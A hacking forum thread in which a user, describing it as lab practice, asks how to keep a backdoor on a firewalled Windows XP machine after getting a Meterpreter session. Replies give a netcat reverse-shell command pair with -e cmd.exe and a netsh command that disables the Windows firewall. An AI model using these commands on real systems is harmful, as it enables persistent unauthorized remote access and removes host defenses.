Jump to content

Evade Firewall On Compromised Machine.


Recommended Posts

Posted (edited)

I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also i tried to install netcat and open a port using netsh command in windows.

But the port doesnt open.

Any other ideas?

c

ps:this is all practised in my virtual lab.

Edited by c0r
Posted

Hi C0R,

In order to create a reverse shell with NetCat you will need to do the following:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e cmd.exe yourhost 3333

Try the above, if doesn't work let me know.

Regards,

Infiltrator

Posted (edited)

Are you trying port 455 (the one that tutorial you posted used as an example) or some other port?

My first instinct is that the Win firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice.

I have the openBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Win version is the same or not.

Edited by chikpee
Posted
I tried this howto Persistent netcat backdoor

but the firewall doenst allow the connection!

c

That's kind of interesting, cause when I created a reverse shell with netcat on my VMs. I was able to get a reverse shell, even with the firewall turned on.

May be you should try using the TCP ports mentioned (80, 443)

Posted

While we're on the subject of netcat...

...anyone know why the openBSD version (as I said above, now also the standard version packaged with Ubuntu) dropped the "-e" option?

Posted
I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also i tried to install netcat and open a port using netsh command in windows.

But the port doesnt open.

Any other ideas?

c

ps:this is all practised in my virtual lab.

Use netsh from cli. A quick google produced:

http://www.windowsnetworking.com/articles_...s-Firewall.html

Posted

@ hexophrenic : tried the netsh command...did not work.If you look at the Metasploit unleashed howto you will see they use the netsh command.

@Infiltrator :

so your saying it works!I'll have another go then...

c

Posted

netsh firewall set opmode mode=DISABLE will disable the firewall.

you can entirely control (assuming GP is absent) the firewall via CLI with appropriate local privs, or with GP is DA rights are available.

what error message did you get?

Posted (edited)

None...that's the wierd part...

I'm trying it out on a new installed xp sp2 now.

Oke...i'm trying this on a fresh xp sp2 version.

I don't get any errors,the firewall adds the exceptions without any problem.

But when i try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

In the windows machine i see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time...times out.

any ideas?

c

Edited by c0r
Posted (edited)
None...that's the wierd part...

I'm trying it out on a new installed xp sp2 now.

Oke...i'm trying this on a fresh xp sp2 version.

I don't get any errors,the firewall adds the exceptions without any problem.

But when i try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

In the windows machine i see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time...times out.

any ideas?

c

What you need to ensure, is that you have one shell listening for incoming connections and the other shell making the outbound connection.

So on the computer that, you wish to turn off the monitor. It should be making connection out. And on the computer, where you are going to remotely control it, have it set to listen.

If else fails, watch this video

Edited by Infiltrator
Posted

Got it to work.Thx for the tips!

After the meterpreter session i disabled the windows firewall then installed metsvc.

Also installing netcat worked.

c

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...